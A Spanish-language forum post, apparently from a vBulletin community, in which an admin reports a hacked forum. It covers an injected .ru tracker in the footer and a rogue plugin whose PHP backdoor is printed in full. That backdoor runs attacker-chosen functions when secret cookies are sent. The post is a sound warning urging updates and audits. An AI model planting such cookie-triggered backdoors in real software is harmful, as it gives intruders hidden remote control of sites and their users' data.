Hace unos dias vi ago raro en el footer de vbsopote, era un gif que yo no habia puesto, luego de ver la plantilla veo que nadie la habia editado, sin embargo tenia el siguiente codigo:

Código HTML:

<center><a rel="nofollow" href="http://www.*******.ru/click" target="_blank"><img src="//******.yadro.ru/logo?26.6" border="0" width="88" height="15" alt="" title="******: показано число посетителей за сегодня"/></a></center>"

tenia la version de 4.1.1 de vbulletin, asi que decidí actualizarlo a la ultima version.

hasta ahi todo bien, pero luego un usuario pidió ayuda paraun plugin asi que antes de dar la respuesta me fuía testearlo y encontré un plugin que adicional a los que ya tengo:

Nombre: vBulletin Templates Cookie Caching
Lugar de Enganche: global_complete
Codigo:

Código PHP:

$vbr="vlttzuyr";$vbh="6253c016bf35bae396188701f125dc4b";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229**********b07fdd58912")&&isset($_COOKIE["vbcache"])&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10); 


Sin necesidad de verlo linea por linea me doy cuenta que con eso han podido tener acceso y pudieron hackear el foro, en tal caso ya fueron eliminados los codigos entra en las plantillas y verificados los plugins (bastó con actualizar todos o reinstalarlos), y muy posiblemente fué un robot quien lo hizo

asi que si ustedes tiene una version inferior de vbulletin, les recomiendo actualizarlo por el tema de parches de seguridad y verificar sus plugins y en hacer una audicion de archivos.

Saludos

Temas Similares:

• vbshout no funciona correctamente... posible error de AJAX
• Agregar Codigo Analytics al Foro (o Tambien Adsense en el NavBar)
• Es posible instalar el vblog 1.0.5 en vBulletin 4?
• 2 dudas en codigo
• Es posible